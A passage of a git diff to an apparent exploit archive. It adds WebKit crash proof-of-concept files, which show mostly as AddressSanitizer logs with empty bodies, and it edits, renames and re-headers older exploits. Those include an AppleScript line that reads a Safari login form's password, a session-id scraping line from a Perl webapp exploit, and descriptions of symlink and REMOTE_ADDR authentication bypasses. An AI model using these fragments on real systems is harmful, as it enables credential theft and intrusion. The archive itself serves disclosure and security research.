heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba4839) in WebCore::SimpleLineLayout::RunResolver::Run::logicalLeft() const +Shadow bytes around the buggy address: + 0x1c0c000ac130: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd + 0x1c0c000ac140: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa + 0x1c0c000ac150: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00 + 0x1c0c000ac160: 00 00 01 fa fa fa fa fa fd fd fd fd fd fd fd fd + 0x1c0c000ac170: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa +=>0x1c0c000ac180: 00 00 00 00 00 00 00 00 fa[fa]fa fa fd fd fd fd + 0x1c0c000ac190: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd + 0x1c0c000ac1a0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa + 0x1c0c000ac1b0: 00 00 00 00 00 00 00 00 fa fa fa fa fd fd fd fd + 0x1c0c000ac1c0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd + 0x1c0c000ac1d0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==30436==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43172.js b/platforms/multiple/dos/43172.js new file mode 100644 index 000000000..6fba27ba1 --- /dev/null +++ b/platforms/multiple/dos/43172.js @@ -0,0 +1,152 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1350 + +There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + + + + + +/* +================================================================= + +ASan log: + +================================================================= +==30453==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200007e474 at pc 0x0001130a7153 bp 0x7fff5463b410 sp 0x7fff5463b408 +READ of size 8 at 0x61200007e474 thread T0 +==30453==WARNING: invalid path to external symbolizer! +==30453==WARNING: Failed to use and restart external symbolizer! + #0 0x1130a7152 in WebCore::SVGPatternElement::collectPatternAttributes(WebCore::PatternAttributes&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e99152) + #1 0x112a5145a in WebCore::RenderSVGResourcePattern::collectPatternAttributes(WebCore::PatternAttributes&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284345a) + #2 0x112a52ec8 in WebCore::RenderSVGResourcePattern::applyResource(WebCore::RenderElement&, WebCore::RenderStyle const&, WebCore::GraphicsContext*&, WTF::OptionSet) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2844ec8) + #3 0x112a5ba15 in WebCore::RenderSVGShape::strokeShape(WebCore::RenderStyle const&, WebCore::GraphicsContext&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284da15) + #4 0x112a5bd93 in WebCore::RenderSVGShape::strokeShape(WebCore::GraphicsContext&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284dd93) + #5 0x112a5bf73 in WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284df73) + #6 0x112a5c607 in WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284e607) + #7 0x112a5808c in WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284a08c) + #8 0x1129f2437 in WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27e4437) + #9 0x11286144d in WebCore::RenderElement::paintAsInlineBlock(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x265344d) + #10 0x1111dca7c in WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfcea7c) + #11 0x1111eaf61 in WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfdcf61) + #12 0x112bce3fb in WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29c03fb) + #13 0x11296d30a in WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x275f30a) + #14 0x11274fd8f in WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2541d8f) + #15 0x1127510f0 in WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25430f0) + #16 0x11274fa11 in WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2541a11) + #17 0x1127504a7 in WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool, WebCore::RenderBlock::PaintBlockType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25424a7) + #18 0x11274ffae in WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2541fae) + #19 0x11274fe87 in WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2541e87) + #20 0x1127510f0 in WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25430f0) + #21 0x11274fa11 in WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2541a11) + #22 0x11290e9e6 in WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector const&, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27009e6) + #23 0x11290a93b in WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector const&, WebCore::GraphicsContext&, WebCore::GraphicsContext&, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26fc93b) + #24 0x112905528 in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26f7528) + #25 0x1129029a2 in WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26f49a2) + #26 0x11290a5ef in WebCore::RenderLayer::paintList(WTF::Vector*, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26fc5ef) + #27 0x1129055ba in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26f75ba) + #28 0x11293f3c6 in WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, WebCore::IntRect const&, unsigned int, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27313c6) + #29 0x11293fb5f in WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2731b5f) + #30 0x110e69212 in WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc5b212) + #31 0x110e7d715 in WebCore::GraphicsLayerCA::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc6f715) + #32 0x112690ca8 in WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2482ca8) + #33 0x1131ccb57 in WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fbeb57) + #34 0x11345a2c7 in -[WebSimpleLayer drawInContext:] (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x324c2c7) + #35 0x7fffdadc0891 in CABackingStoreUpdate_ (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x13891) + #36 0x7fffdaedf557 in invocation function for block in CA::Layer::display_() (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x132557) + #37 0x7fffdaedf06f in CA::Layer::display_() (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x13206f) + #38 0x113459fbc in -[WebSimpleLayer display] (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x324bfbc) + #39 0x7fffdaed3051 in CA::Layer::display_if_needed(CA::Transaction*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x126051) + #40 0x7fffdaed317c in CA::Layer::layout_and_display_if_needed(CA::Transaction*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x12617c) + #41 0x7fffdaec8933 in CA::Context::commit_transaction(CA::Transaction*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x11b933) + #42 0x7fffdadbd7e0 in CA::Transaction::commit() (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x107e0) + #43 0x7fffdadbe1fb in CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x111fb) + #44 0x7fffd52aed36 in __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa6d36) + #45 0x7fffd52aeca6 in __CFRunLoopDoObservers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa6ca6) + #46 0x7fffd528f135 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87135) + #47 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #48 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #49 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #50 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #51 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #52 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #53 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #54 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #55 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #56 0x10b5bf56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #57 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x61200007e474 is located 28 bytes to the right of 280-byte region [0x61200007e340,0x61200007e458) +allocated by thread T0 here: + #0 0x10b626d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x11ede4ad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x11ede2d6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x11ed69247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x11ed6863a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x110354648 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x146648) + #7 0x113041e7d in WebCore::SVGFilterElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e33e7d) + #8 0x112ff58a3 in WebCore::filterConstructor(WebCore::QualifiedName const&, WebCore::Document&, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de78a3) + #9 0x112ff294d in WebCore::SVGElementFactory::createElement(WebCore::QualifiedName const&, WebCore::Document&, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de494d) + #10 0x11099ad80 in WebCore::Document::createElement(WebCore::QualifiedName const&, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78cd80) + #11 0x110f1ed2d in WebCore::HTMLConstructionSite::createElement(WebCore::AtomicHTMLToken&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd10d2d) + #12 0x110f1eabe in WebCore::HTMLConstructionSite::insertForeignElement(WebCore::AtomicHTMLToken&&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd10abe) + #13 0x11108190a in WebCore::HTMLTreeBuilder::processTokenInForeignContent(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe7390a) + #14 0x111080d07 in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe72d07) + #15 0x110f49c8a in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3bc8a) + #16 0x110f49849 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3b849) + #17 0x110f489c2 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a9c2) + #18 0x110f4a4e8 in WebCore::HTMLDocumentParser::append(WTF::RefPtr&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3c4e8) + #19 0x110928531 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x71a531) + #20 0x110a6563d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x85763d) + #21 0x110a26736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #22 0x1104a2047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #23 0x11049adf1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #24 0x112f72661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #25 0x10db2d43b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #26 0x10db306d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #27 0x10db2fbc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #28 0x10d321117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #29 0x10d100695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + +SUMMARY: AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e99152) in WebCore::SVGPatternElement::collectPatternAttributes(WebCore::PatternAttributes&) const +Shadow bytes around the buggy address: + 0x1c240000fc30: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x1c240000fc40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c240000fc50: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa + 0x1c240000fc60: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x1c240000fc70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x1c240000fc80: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa[fa]fa + 0x1c240000fc90: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x1c240000fca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c240000fcb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c240000fcc0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x1c240000fcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==30453==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43173.html b/platforms/multiple/dos/43173.html new file mode 100644 index 000000000..0d1b8ffee --- /dev/null +++ b/platforms/multiple/dos/43173.html @@ -0,0 +1,162 @@ + + + +
+ + + + + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/43174.html b/platforms/multiple/dos/43174.html new file mode 100644 index 000000000..bee51fea5 --- /dev/null +++ b/platforms/multiple/dos/43174.html @@ -0,0 +1,168 @@ + + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/43175.html b/platforms/multiple/dos/43175.html new file mode 100644 index 000000000..88d1ce7fd --- /dev/null +++ b/platforms/multiple/dos/43175.html @@ -0,0 +1,214 @@ + + + + + +
+
+ + + + \ No newline at end of file diff --git a/platforms/multiple/dos/43176.html b/platforms/multiple/dos/43176.html new file mode 100644 index 000000000..6a14e8e83 --- /dev/null +++ b/platforms/multiple/dos/43176.html @@ -0,0 +1,194 @@ + + + + +
+ + + + + \ No newline at end of file diff --git a/platforms/multiple/local/19498.sh b/platforms/multiple/local/19498.sh index 64d8e3283..bdd0d73ea 100755 --- a/platforms/multiple/local/19498.sh +++ b/platforms/multiple/local/19498.sh @@ -1,8 +1,9 @@ -source: http://www.securityfocus.com/bid/636/info - -This explanation is quoted from the initial post on this problem by Job De Hass. This message is available in its entirety in the 'Credit' section of this vulnerability entry. - -The CDE subprocess daemon /usr/dt/bin/dtspcd contains an insufficient check on client credentials. The CDE subprocess daemon allows cross-platform invocation of applications. In order to authenticate the remote user, the daemon generates a filename which is to be created by the client and then is verified by the daemon. When verifying the created file, the daemon uses stat() instead of lstat() and is subsequently vulnerable to a symlink attack. Further more the daemon seems to allow empty usernames and then reverts to a publicly write-able directory (/var/dt/tmp). +#!/bin/sh +# source: http://www.securityfocus.com/bid/636/info +# +# This explanation is quoted from the initial post on this problem by Job De Hass. This message is available in its entirety in the 'Credit' section of this vulnerability entry. +# +# The CDE subprocess daemon /usr/dt/bin/dtspcd contains an insufficient check on client credentials. The CDE subprocess daemon allows cross-platform invocation of applications. In order to authenticate the remote user, the daemon generates a filename which is to be created by the client and then is verified by the daemon. When verifying the created file, the daemon uses stat() instead of lstat() and is subsequently vulnerable to a symlink attack. Further more the daemon seems to allow empty usernames and then reverts to a publicly write-able directory (/var/dt/tmp). #!/bin/sh # diff --git a/platforms/multiple/remote/34136.txt b/platforms/multiple/webapps/34136.txt similarity index 100% rename from platforms/multiple/remote/34136.txt rename to platforms/multiple/webapps/34136.txt diff --git a/platforms/osx/local/29950.js b/platforms/osx/local/29950.js index ad329af49..82554a37b 100644 --- a/platforms/osx/local/29950.js +++ b/platforms/osx/local/29950.js @@ -2,8 +2,6 @@ source: http://www.securityfocus.com/bid/23825/info Apple Safari is prone to an unspecified local vulnerability. -Few technical details are currently available. We will update this BID as more information emerges. - tell application "Safari" do JavaScript "alert(document.loginform.password.value)" in document 1 end tell \ No newline at end of file diff --git a/platforms/osx/remote/758.c b/platforms/osx/local/758.c similarity index 100% rename from platforms/osx/remote/758.c rename to platforms/osx/local/758.c diff --git a/platforms/osx/remote/1265.pl b/platforms/osx/remote/1265.pl index 295b94a6f..78560711a 100755 --- a/platforms/osx/remote/1265.pl +++ b/platforms/osx/remote/1265.pl @@ -1,3 +1,4 @@ + #!/usr/bin/perl # VERITAS-OSX.pl - VERITAS NetBackup Format Strings OSX/ppc Remote Exploit # johnh[at]digitalmunition[dot]com diff --git a/platforms/php/webapps/2348.pl b/platforms/php/webapps/2348.pl index 114f0eb8e..001570d9e 100755 --- a/platforms/php/webapps/2348.pl +++ b/platforms/php/webapps/2348.pl @@ -37,7 +37,7 @@ my $res = $ua->request($req); $res=$ua->get('http://'.$ARGV[0].'/login.php'); $content=$res->content; -$content=~ m/true&sid=([^"]+)"/g; +$content=~ m/true&sid=([^"]+)"/g; if($ARGV[4]){ $content=$res->content; print $content; diff --git a/platforms/php/webapps/30036.html b/platforms/php/webapps/30036.html index f40179086..de8c10641 100644 --- a/platforms/php/webapps/30036.html +++ b/platforms/php/webapps/30036.html @@ -1,7 +1,6 @@ -source: http://www.securityfocus.com/bid/23965/info +
\ No newline at end of file diff --git a/platforms/sco/local/23141.sh b/platforms/sco/local/23141.sh index 52bbf9a9f..d18958f78 100755 --- a/platforms/sco/local/23141.sh +++ b/platforms/sco/local/23141.sh @@ -1,6 +1,8 @@ -source: http://www.securityfocus.com/bid/8616/info - -It has been reported that SCO OpenServer Internet Manager 'mana' process is prone to an authentication bypass issue. The issue is reported to occur as a local user is able to export the REMOTE_ADDR environment variable and set its value to 127.0.0.1. This would cause the mana process to execute the file menu.mana with administrative privileges without proper authentication. Normally executing mana would require proper credentials. +#!/bin/sh +#source: http://www.securityfocus.com/bid/8616/info +# +#It has been reported that SCO OpenServer Internet Manager 'mana' process is prone to an authentication bypass issue. The issue is reported to occur as a local user is able to export the REMOTE_ADDR environment variable and set its value to 127.0.0.1. This would cause the mana process to execute the file menu.mana with administrative privileges without proper authentication. Normally executing mana would require proper credentials. +# #!/bin/sh # diff --git a/platforms/solaris/local/15245.txt b/platforms/solaris/dos/15245.txt similarity index 100% rename from platforms/solaris/local/15245.txt rename to platforms/solaris/dos/15245.txt diff --git a/platforms/solaris/local/19161.txt b/platforms/solaris/dos/19161.txt similarity index 100% rename from platforms/solaris/local/19161.txt rename to platforms/solaris/dos/19161.txt diff --git a/platforms/windows/local/403.c b/platforms/windows/dos/403.c similarity index 100% rename from platforms/windows/local/403.c rename to platforms/windows/dos/403.c diff --git a/platforms/windows/remote/9815.py b/platforms/windows/dos/9815.py similarity index 100% rename from platforms/windows/remote/9815.py rename to platforms/windows/dos/9815.py diff --git a/platforms/windows/remote/9817.py b/platforms/windows/dos/9817.py similarity index 100% rename from 